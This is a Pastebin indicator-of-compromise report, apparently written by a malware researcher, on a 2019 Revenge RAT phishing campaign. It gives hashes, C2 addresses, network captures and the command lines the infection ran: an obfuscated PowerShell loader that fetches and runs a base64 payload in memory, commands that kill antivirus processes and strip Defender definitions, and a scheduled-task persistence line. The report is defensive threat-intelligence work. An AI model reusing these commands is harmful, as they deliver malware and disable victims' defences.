VRad

#revengeRAT_110419

Apr 12th, 2019
1,092
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #revenge #RAT #mshta #powershell #RTF #XML #pastebin
  2.  
  3. https://pastebin.com/JKMHyvgx
  4.  
  5. FAQ:
  6. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
  7. https://xakep.ru/2016/09/01/revenge-rat/
  8.  
  9. attack_vector
  10. --------------
  11. email attach .xlam / .doc > mshta GET pastebin1 > powershell > GET pastebin2 (base64) > run decoded exe in memory(!)
  12.  
  13. email_headers
  14. --------------
  15. Received: from maiilboxin.com (unknown [138.197.202.86])
  16. Received: from [216.170.122.25]
  17. Subject: FW:PAYMENT -INV0978
  18. To: user00@victim1.com
  19. From: "Accounting dept." <support@maiilboxin.com>
  20. Date: Thu, 11 Apr 2019 17:25:23 -0700
  21.  
  22. files
  23. --------------
  24. SHA-256 1c0cf0e8e66cff93fb9751874b39bd3099b245c424386d2415fb55c937b31595
  25. File name INV0978.xlam [Microsoft Excel 2007+, XML, Macro, Auto_Open]
  26. File size 21.67 KB (22188 bytes)
  27.  
  28. SHA-256 187309d3b4688db0e9e98a40a83a497cbda7baecbaf0d0761f589f059040b670
  29. File name TT copy.doc (RTF) [Rich Text Format data, version 1, ANSI]
  30. File size 356.87 KB (365432 bytes)
  31.  
  32. SHA-256 e2c972dacd94f06555b108f96b39f1435202d04c92006721556ffe5cf14c74bd
  33. File name aiahAcur (payload_1.exe) [PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows]
  34. File size 17 KB (17408 bytes)
  35.  
  36.  
  37. activity
  38. **************
  39. INV0978.xlam > mshta pastebin{.} com/raw/gnYu4MJK > powershell pastebin{.} com/raw/aiahAcur
  40.  
  41. TT copy.doc > mshta pastebin{.} com/raw/gnYu4MJK > powershell pastebin{.} com/raw/aiahAcur
  42.  
  43. PL_SRC: 104.20.209.21 pastebin{.} com/raw/aiahAcur
  44.  
  45. C2: 23.249.165.151 indexghost{.} duckdns{.} org
  46.  
  47. netwrk
  48. --------------
  49. ssl
  50. 104.20.209.21 pastebin{.} com Client Hello
  51.  
  52. C2
  53. 23.249.165.151 [TCP ACKed unseen segment] 50092 → 2336 [PSH, ACK] Seq=322 Ack=12 Win=62499 Len=11
  54.  
  55. comp
  56. --------------
  57. mshta.exe 3540 TCP localhost 50090 104.20.209.21 443 ESTABLISHED
  58. powershell.exe 3960 TCP localhost 50091 104.20.209.21 443 ESTABLISHED
  59. powershell.exe 3960 TCP localhost 50092 23.249.165.151 2336 ESTABLISHED
  60.  
  61. proc
  62. --------------
  63. "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
  64.  
  65. C:\Windows\SysWOW64\mshta.exe https://pastebin{.} com/raw/gnYu4MJK
  66.  
  67. "C:\Windows\System32\cmd.exe" /C forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & exit
  68. C:\Windows\SysWOW64\forfiles.exe /c "taskkill /f /im AvastUi.exe"
  69.  
  70. "C:\Windows\System32\cmd.exe" /c cd "C:\Program Files (x86)\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & forfiles /c "taskkill /f /im MSASCuiL.exe" & forfiles /c "taskkill /f /im MpCmdRun.exe" & exit
  71.  
  72. "C:\Windows\System32\forfiles.exe" /c "cmd /c powershell -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 't' + 't' + 'p' + 's' + ':' + '/' + '/' + 'pastebin{.} com/raw/aiahAcur'))).EnTrYPoInT.InVoKe($N,$N)"
  73. C:\Windows\SysWOW64\cmd.exe /c powershell -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 't' + 't' + 'p' + 's' + ':' + '/' + '/' + 'pastebin{.} com/raw/aiahAcur'))).EnTrYPoInT.InVoKe($N,$N)
  74. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 't' + 't' + 'p' + 's' + ':' + '/' + '/' + 'pastebin{.} com/raw/aiahAcur'))).EnTrYPoInT.InVoKe($N,$N)
  75.  
  76. "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn "MSOFFICEER" /tr "mshta vbscript:CreateObject(\"Wscript.Shell\").Run(\"mshta.exe https://pastebin{.} com/raw/aiahAcur\",0,true)(window.close)" /F
  77.  
  78. persist
  79. --------------
  80. \MSOFFICEER
  81. Microsoft (R) HTML Application host Microsoft Corporation
  82. c:\windows\system32\mshta.exe 14.10.2013 8:47
  83. "mshta" vbscript:CreateObject("Wscript.Shell").Run("mshta.exe https://pastebin{.} com/raw/aiahAcur",0,true)(window.close)
  84.  
  85. drop
  86. --------------
  87. [harm]
  88. %temp%\fqkril4n.4zd.ps1
  89.  
  90. [harmless]
  91. %temp%\~DFC438B89F8956E942.TMP
  92. %temp%\9568250.od
  93. %temp%\CVRFFFA.tmp.cvr
  94.  
  95. # # #
  96. https://www.virustotal.com/gui/file/1c0cf0e8e66cff93fb9751874b39bd3099b245c424386d2415fb55c937b31595/details
  97. https://www.virustotal.com/gui/file/187309d3b4688db0e9e98a40a83a497cbda7baecbaf0d0761f589f059040b670/details
  98. https://www.virustotal.com/gui/url/6b8f2a876d58ae681f494eac0d978800b2f3aa3d149abb55f6859c79ae238901/details
  99. https://www.virustotal.com/gui/url/5e197c5b281e3d7a436f2b0800180085e1a5ad5f80b3649ef3225e3fdafa8e38/details
  100. https://www.virustotal.com/gui/file/e2c972dacd94f06555b108f96b39f1435202d04c92006721556ffe5cf14c74bd/details
  101. https://analyze.intezer.com/#/analyses/a6f1dcf3-4672-4297-ac7a-a8f0f5b60c1d
  102.  
  103. VR
RAW Paste Data